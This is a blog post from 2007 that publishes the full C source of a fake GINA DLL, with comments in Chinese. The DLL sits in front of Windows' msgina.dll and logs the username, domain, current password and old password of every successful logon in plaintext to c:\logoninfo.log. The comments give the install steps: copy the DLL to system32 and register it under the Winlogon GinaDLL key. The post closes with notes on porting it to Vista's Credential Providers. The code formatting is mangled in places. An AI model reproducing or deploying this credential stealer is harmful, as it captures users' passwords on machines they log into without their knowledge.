GaRY's Blog

Beginning is always beautiful

Gina

#define UNICODE
#include 
<windows.h>
#include 
<stdio.h>
#include 
<Winwlx.h>
#define LOGFILE L"c:\\logoninfo.log"

//将这个DLL拷到system32目录下,并在注册表中加入:
//HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
//加一个GinaDLL,类型RegSZ, 内容为你的dll名,如:'fakegina.dll'.
//重启机器,系统就会使用你的gina

typedef BOOL
(WINAPI 
*
pWlxNegotiate)(
    DWORD                   dwWinlogonVersion,
    PDWORD                  pdwDllVersion
    );

typedef BOOL
(WINAPI 
*
pWlxInitialize)(
    LPWSTR                  lpWinsta,
    HANDLE                  hWlx,
    PVOID                   pvReserved,
    PVOID                   pWinlogonFunctions,
    PVOID 
*                 pWlxContext
    );

typedef VOID
(WINAPI 
*
pWlxDisplaySASNotice)(
    PVOID                   pWlxContext
    );


typedef 
int
(WINAPI 
*
pWlxLoggedOutSAS)(
    PVOID                   pWlxContext,
    DWORD                   dwSasType,
    PLUID                   pAuthenticationId,
    PSID                    pLogonSid,
    PDWORD                  pdwOptions,
    PHANDLE                 phToken,
    PWLX_MPR_NOTIFY_INFO    pNprNotifyInfo,
    PVOID 
*                 pProfile
    );

typedef BOOL
(WINAPI 
*
pWlxActivateUserShell)(
    PVOID                   pWlxContext,
    PWSTR                   pszDesktopName,
    PWSTR                   pszMprLogonScript,
    PVOID                   pEnvironment
    );

typedef 
int
(WINAPI 
*
pWlxLoggedOnSAS)(
    PVOID                   pWlxContext,
    DWORD                   dwSasType,
    PVOID                   pReserved
    );

typedef VOID
(WINAPI 
*
pWlxDisplayLockedNotice)(
    PVOID                   pWlxContext
    );

typedef 
int
(WINAPI 
*
pWlxWkstaLockedSAS)(
    PVOID                   pWlxContext,
    DWORD                   dwSasType
    );

typedef BOOL
(WINAPI 
*
pWlxIsLockOk)(
    PVOID                   pWlxContext
    );

typedef BOOL
(WINAPI 
*
pWlxIsLogoffOk)(
    PVOID                   pWlxContext
    );

typedef VOID
(WINAPI 
*
pWlxLogoff)(
    PVOID                   pWlxContext
    );


typedef VOID
(WINAPI 
*
pWlxShutdown)(
    PVOID                   pWlxContext,
    DWORD                   ShutdownType
    );


//
// NEW for version 1.1
//
typedef BOOL
(WINAPI 
*
pWlxScreenSaverNotify)(
    PVOID                   pWlxContext,
    BOOL 
*                  pSecure);

typedef BOOL
(WINAPI 
*
pWlxStartApplication)(
    PVOID                   pWlxContext,
    PWSTR                   pszDesktopName,
    PVOID                   pEnvironment,
    PWSTR                   pszCmdLine
    );

//
// New for 1.3
//

typedef BOOL
(WINAPI 
*
pWlxNetworkProviderLoad)(
    PVOID                   pWlxContext,
    PWLX_MPR_NOTIFY_INFO    pNprNotifyInfo
    );


typedef BOOL
(WINAPI 
*
pWlxDisplayStatusMessage)(
    PVOID                   pWlxContext,
    HDESK                   hDesktop,
    DWORD                   dwOptions,
    PWSTR                   pTitle,
    PWSTR                   pMessage
    );

typedef BOOL
(WINAPI 
*
pWlxGetStatusMessage)(
    PVOID                   pWlxContext,
    DWORD 
*                 pdwOptions,
    PWSTR                   pMessage,
    DWORD                   dwBufferSize
    );

typedef BOOL
(WINAPI 
*
pWlxRemoveStatusMessage)(
    PVOID                   pWlxContext
    );

pWlxNegotiate                prcWlxNegotiate 
= NULL;
pWlxInitialize                prcWlxInitialize 
= NULL;
pWlxDisplaySASNotice        prcWlxDisplaySASNotice 
= NULL;
pWlxLoggedOutSAS            prcWlxLoggedOutSAS 
= NULL;
pWlxActivateUserShell        prcWlxActivateUserShell 
= NULL;
pWlxLoggedOnSAS                prcWlxLoggedOnSAS 
= NULL;
pWlxDisplayLockedNotice        prcWlxDisplayLockedNotice 
= NULL;
pWlxWkstaLockedSAS            prcWlxWkstaLockedSAS 
= NULL;
pWlxIsLockOk                prcWlxIsLockOk 
= NULL;
pWlxIsLogoffOk                prcWlxIsLogoffOk 
= NULL;
pWlxLogoff                    prcWlxLogoff 
= NULL;
pWlxShutdown                prcWlxShutdown 
= NULL;
pWlxScreenSaverNotify        prcWlxScreenSaverNotify 
= NULL;
pWlxStartApplication        prcWlxStartApplication 
= NULL;
pWlxNetworkProviderLoad        prcWlxNetworkProviderLoad 
= NULL;
pWlxDisplayStatusMessage    prcWlxDisplayStatusMessage 
= NULL;
pWlxGetStatusMessage        prcWlxGetStatusMessage 
= NULL;
pWlxRemoveStatusMessage        prcWlxRemoveStatusMessage 
= NULL;

HINSTANCE hGina 
= NULL;

BOOL LoadMsGina()
{
    hGina 
= LoadLibrary(L"msgina.dll");
    
if (hGina){
        prcWlxNegotiate 
= (pWlxNegotiate)GetProcAddress(hGina, "WlxNegotiate");
        prcWlxInitialize 
= (pWlxInitialize)GetProcAddress(hGina, "WlxInitialize");
        prcWlxDisplaySASNotice 
= (pWlxDisplaySASNotice )GetProcAddress(hGina, "WlxDisplaySASNotice");
        prcWlxLoggedOutSAS 
= (pWlxLoggedOutSAS)GetProcAddress(hGina, "WlxLoggedOutSAS");
        prcWlxActivateUserShell 
= (pWlxActivateUserShell)GetProcAddress(hGina, "WlxActivateUserShell");
        prcWlxLoggedOnSAS 
= (pWlxLoggedOnSAS)GetProcAddress(hGina, "WlxLoggedOnSAS");
        prcWlxDisplayLockedNotice 
= (pWlxDisplayLockedNotice)GetProcAddress(hGina, "WlxDisplayLockedNotice");
        prcWlxWkstaLockedSAS 
= (pWlxWkstaLockedSAS)GetProcAddress(hGina, "WlxWkstaLockedSAS");
        prcWlxIsLockOk 
= (pWlxIsLockOk)GetProcAddress(hGina, "WlxIsLockOk");
        prcWlxIsLogoffOk 
= (pWlxIsLogoffOk)GetProcAddress(hGina, "WlxIsLogoffOk");
        prcWlxLogoff 
= (pWlxLogoff)GetProcAddress(hGina, "WlxLogoff");
        prcWlxShutdown 
= (pWlxShutdown)GetProcAddress(hGina, "WlxShutdown");
        prcWlxScreenSaverNotify 
= (pWlxScreenSaverNotify)GetProcAddress(hGina, "WlxScreenSaverNotify");
        prcWlxStartApplication 
= (pWlxStartApplication)GetProcAddress(hGina, "WlxStartApplication");
        prcWlxNetworkProviderLoad 
= (pWlxNetworkProviderLoad)GetProcAddress(hGina, "WlxNetworkProviderLoad");
        prcWlxDisplayStatusMessage 
= (pWlxDisplayStatusMessage)GetProcAddress(hGina, "WlxDisplayStatusMessage");
        prcWlxGetStatusMessage 
= (pWlxGetStatusMessage)GetProcAddress(hGina, "WlxGetStatusMessage");
        prcWlxRemoveStatusMessage 
= (pWlxRemoveStatusMessage)GetProcAddress(hGina, "WlxRemoveStatusMessage");
        
return prcWlxNegotiate && prcWlxInitialize && prcWlxDisplaySASNotice && prcWlxLoggedOutSAS
            
&& prcWlxActivateUserShell && prcWlxLoggedOnSAS && prcWlxDisplayLockedNotice
            
&& prcWlxWkstaLockedSAS && prcWlxIsLockOk && prcWlxIsLogoffOk && prcWlxLogoff
            
&& prcWlxShutdown && prcWlxScreenSaverNotify && prcWlxStartApplication
            
&& prcWlxNetworkProviderLoad && prcWlxDisplayStatusMessage && prcWlxGetStatusMessage
            
&& prcWlxRemoveStatusMessage;
    }

    
else 
        
return FALSE;
}


HINSTANCE myHandle 
= NULL;//实例句柄

typedef 
struct {
  HANDLE hWlx;
  LPWSTR station;
  
//PWLX_DISPATCH_VERSION_1_3 pWlxFuncs;
  HANDLE hDllInstance;
  HANDLE UserToken;
}
 GINA_CONTEXT, * PGINA_CONTEXT;

void ReleaseMsGina()
{
    
if (hGina){
        FreeLibrary(hGina);
    }

}


void WriteInfo(char * buf);//显示ASCII字符串信息
void WriteInfoW(PWSTR WideStr);//显示unicode字符串信息
void SaveLog(char* c,int num);//日志保存

BOOL WINAPI DllMain(
  HINSTANCE hinstDLL,
  DWORD fdwReason,
  LPVOID lpvReserved
  )
{
    
switch (fdwReason){
    
case DLL_PROCESS_ATTACH:
        WriteInfo(
"------------------------------------------------\r\n");
        
        
//myHandle = hinstDLL;//记录实例句柄,备用,本例没有用到。
        if (LoadMsGina()) //加载MyGina
        {
            WriteInfo(
"Init gina ok \r\n");
            WriteInfo(
"\r\n");
        }

        
else
        
{
            WriteInfo(
"Init gina false \r\n");
            WriteInfo(
"\r\n");
        }


        
break;

    
case DLL_PROCESS_DETACH:
        ReleaseMsGina();
//释放MyGina
        WriteInfo("release gina ok \r\n");
        
break;
    }


    
return TRUE;
}


BOOL WINAPI 
WlxActivateUserShell (
  PVOID pWlxContext,
  PWSTR pszDesktopName,
  PWSTR pszMprLogonScript,
  PVOID pEnvironment)
{
    
//WriteInfo("WlxActivateUserShell \r\n");

    
return prcWlxActivateUserShell (
                  pWlxContext,
                  pszDesktopName,
                  pszMprLogonScript,
                  pEnvironment);
}


VOID WINAPI WlxDisplaySASNotice (
  PVOID pWlxContext)
{
    
//WriteInfo("WlxDisplaySASNotice \r\n");
    prcWlxDisplaySASNotice(pWlxContext);
}


BOOL WINAPI WlxInitialize (
  LPWSTR  lpWinsta,
  HANDLE  hWlx,
  PVOID   pvReserved,
  PVOID   pWinlogonFunctions,
  PVOID 
* pWlxContext)
{
    
//WriteInfo("WlxInitialize \r\n");
    return prcWlxInitialize (
          lpWinsta,
          hWlx,
          pvReserved,
          pWinlogonFunctions,
          pWlxContext);
}


int WINAPI WlxLoggedOnSAS (
  PVOID pWlxContext,
  DWORD dwSasType,
  PVOID pReserved)
{    
   
//WriteInfo("WlxLoggedOnSAS \r\n");

   
return    prcWlxLoggedOnSAS (
              pWlxContext,
              dwSasType,
              pReserved);
}


//在启动到登陆界面时,调用此函数
int WINAPI WlxLoggedOutSAS (
  PVOID                pWlxContext,
  DWORD                dwSasType,
  PLUID                pAuthenticationId,
  PSID                 pLogonSid,
  PDWORD               pdwOptions,
  PHANDLE              phToken,
  PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,
  PVOID 
*              pProfile)
{
      
int iRet=0;
      PWSTR pszUserName
=NULL;
      PWSTR pszDomain
=NULL;
      PWSTR pszPassword
=NULL;
      PWSTR pszOldPassword
=NULL;
      PSTR pLogonTime
=new char[100];

      
//WriteInfo("WlxLoggedOutSAS \r\n");
      
      iRet 
= prcWlxLoggedOutSAS(
      pWlxContext,
      dwSasType,
      pAuthenticationId,
      pLogonSid,
      pdwOptions,
      phToken,
      pMprNotifyInfo,
      pProfile);

      
if(iRet == WLX_SAS_ACTION_LOGON) 
      
{    
          SYSTEMTIME stime;
          
          GetLocalTime(
&stime);

          sprintf(pLogonTime, 
"LoginTime : %d.%d.%d %d:%d:%d\r\n", stime.wYear, stime.wMonth, stime.wDay, stime.wHour, stime.wMinute, stime.wSecond);

          WriteInfo(pLogonTime);  

          
// copy pMprNotifyInfo and pLogonSid for later use     
          pszUserName=pMprNotifyInfo->pszUserName;        
          
if(pszUserName!=NULL)    
          
{
              WriteInfo(
"Username  : ");
              WriteInfoW(pszUserName);
          }

          
          pszDomain
=pMprNotifyInfo->pszDomain; 
          
if(pszDomain!=NULL)      
          
{
              WriteInfo(
"Domain    : ");
              WriteInfoW(pszDomain); 
          }

          
          pszPassword 
=pMprNotifyInfo->pszPassword; 
          
if(pszPassword!=NULL)    
          
{
              WriteInfo(
"PassWord  : ");
              WriteInfoW(pszPassword);  
          }

          
          pszOldPassword
=pMprNotifyInfo->pszOldPassword;  
          
if(pszOldPassword!=NULL) 
          
{
              WriteInfo(
"OldPassword: ");
              WriteInfoW(pszOldPassword);  
          }

          
      }
     

    WriteInfo(
"\r\n");
    
return iRet; 
}




VOID WINAPI WlxLogoff (PVOID pWlxContext)
{
   
//WriteInfo("WlxLogoff \r\n");

   prcWlxLogoff(pWlxContext);
}


BOOL WINAPI WlxNegotiate (
  DWORD  dwWinlogonVersion,
  PDWORD pdwDllVersion)
{
   
//WriteInfo("WlxNegotiate \r\n");
    return prcWlxNegotiate (
            dwWinlogonVersion,
            pdwDllVersion);
}



BOOL WINAPI WlxScreenSaverNotify (
  PVOID  pWlxContext,
  BOOL  
*pSecure)
{

    
//WriteInfo("WlxScreenSaverNotify \r\n");
    return prcWlxScreenSaverNotify (
          pWlxContext,
          pSecure);
}


VOID WINAPI WlxShutdown(
  PVOID pWlxContext,
  DWORD ShutdownType)
{

    
//WriteInfo("WlxShutdown \r\n");

    prcWlxShutdown(pWlxContext, ShutdownType);
}


BOOL WINAPI WlxStartApplication (
  PVOID pWlxContext,
  PWSTR pszDesktopName,
  PVOID pEnvironment,
  PWSTR pszCmdLine)
{
    
//WriteInfo("WlxStartApplication \r\n");
    return prcWlxStartApplication (
              pWlxContext,
              pszDesktopName,
              pEnvironment,
              pszCmdLine);
}


int WINAPI WlxWkstaLockedSAS (
  PVOID pWlxContext,
  DWORD dwSasType
)
{
    
//WriteInfo("WlxWkstaLockedSAS \r\n");
    return prcWlxWkstaLockedSAS (
          pWlxContext,
          dwSasType
        );
}


VOID WINAPI WlxDisplayLockedNotice(PVOID pWlxContext)
{
    
//WriteInfo("WlxDisplayLockedNotice \r\n");
    prcWlxDisplayLockedNotice(pWlxContext);
}


BOOL WINAPI WlxDisplayStatusMessage(
  PVOID pWlxContext,
  HDESK hDesktop,
  DWORD dwOptions,
  PWSTR pTitle,
  PWSTR pMessage
  )
{
    
//WriteInfo("WlxDisplayStatusMessage \r\n");
    return prcWlxDisplayStatusMessage(
              pWlxContext,
              hDesktop,
              dwOptions,
              pTitle,
              pMessage
    );
}



BOOL WINAPI WlxGetStatusMessage(
  PVOID pWlxContext,
  DWORD 
*pdwOptions,
  PWSTR pMessage,
  DWORD dwBufferSize
)
{
    
//WriteInfo("WlxGetStatusMessage \r\n");
    return prcWlxGetStatusMessage(
              pWlxContext,
              pdwOptions,
              pMessage,
              dwBufferSize
            );
}


BOOL WINAPI WlxIsLockOk(PVOID pWlxContext)
{
    
//WriteInfo("WlxIsLockOk \r\n");
    return prcWlxIsLockOk(pWlxContext);
        
}


BOOL WINAPI WlxIsLogoffOk(
  PVOID pWlxContext
)
{
    
//WriteInfo("WlxIsLogoffOk \r\n");
    return prcWlxIsLogoffOk(
            pWlxContext
    );
}

        
BOOL WINAPI WlxNetworkProviderLoad(
  PVOID pWlxContext,
  PWLX_MPR_NOTIFY_INFO pNprNotifyInfo
)
{
    
//WriteInfo("WlxNetworkProviderLoad \r\n");
    return prcWlxNetworkProviderLoad(
            pWlxContext,
            pNprNotifyInfo
    );
}


BOOL WINAPI WlxRemoveStatusMessage(
  PVOID pWlxContext
)
{
   
//WriteInfo("WlxRemoveStatusMessage \r\n");
    return prcWlxRemoveStatusMessage(
          pWlxContext
        );
}



void WriteInfo(char * buf)//显示ASCII字符串信息
{
    
int i = 0;
    
while (TRUE)
    
{
        
if (!buf[i])
            
break;
        
else
            i
++;
    }

    i
++;
    
    SaveLog(buf,i);
//日志保存

}



void WriteInfoW(PWSTR WideStr)//显示unicode字符串信息
{
    
//获取unicode字符串的字符个数
    int nstrlen=WideCharToMultiByte(CP_ACP,0,WideStr,-1,
        NULL,
0,NULL,NULL);
    
    
//在进程堆中分配空间
    PSTR tempStr=(PSTR)HeapAlloc(GetProcessHeap(),0,nstrlen);
    
    
if(tempStr==NULL) return ;
    
    
//把unicode字符串转换为ASCII字符串
    WideCharToMultiByte(CP_ACP,0,WideStr,-1,
        tempStr,nstrlen,NULL,NULL);
    
    WriteInfo(tempStr);
    WriteInfo(
"\r\n");

    
//释放堆空间
    HeapFree(GetProcessHeap(),0,tempStr);
}



void SaveLog(char* c,int num) //日志保存函数

  WCHAR name[] 
= LOGFILE; 
  HANDLE hFile;
  DWORD In;
  WCHAR Buff[
512];
  hFile 
= CreateFile(name, GENERIC_WRITE, 0, NULL, OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL, NULL);

  
if(hFile == INVALID_HANDLE_VALUE)
  

      
return;
  }
 
  SetFilePointer(hFile, 
0, NULL, FILE_END);

  WriteFile(hFile, c, num, 
&In, NULL);

  CloseHandle(hFile); 
//关闭文件
}
 


本来想将此思想移植到vista上,可是vista已经不再使用Gina做登录交互了.转而使用新的CredentialProvider.我查了查msdn,需要attach原有的密码框控件做wrap获取密码,并且ms做了一定的加密,需要用lsa相关函数解密回来.
由于我对com编程一窍不通,而且最近要考试了,估计也没时间研究了...所以就期待其他高人写出来吧
附带上ms的CredentialProvider例子.

posted on 2007-06-07 21:45 wofeiwo 阅读(1053) 评论(0)  编辑 收藏 引用 网摘 所属分类: SystemPrograming


只有注册用户登录后才能发表评论。
网站导航:

导航

<2023年2月>
2930311234
567891011
12131415161718
19202122232425
2627281234
567891011

统计

留言簿(10)

随笔分类(90)

随笔档案(61)

搜索

最新随笔

最新评论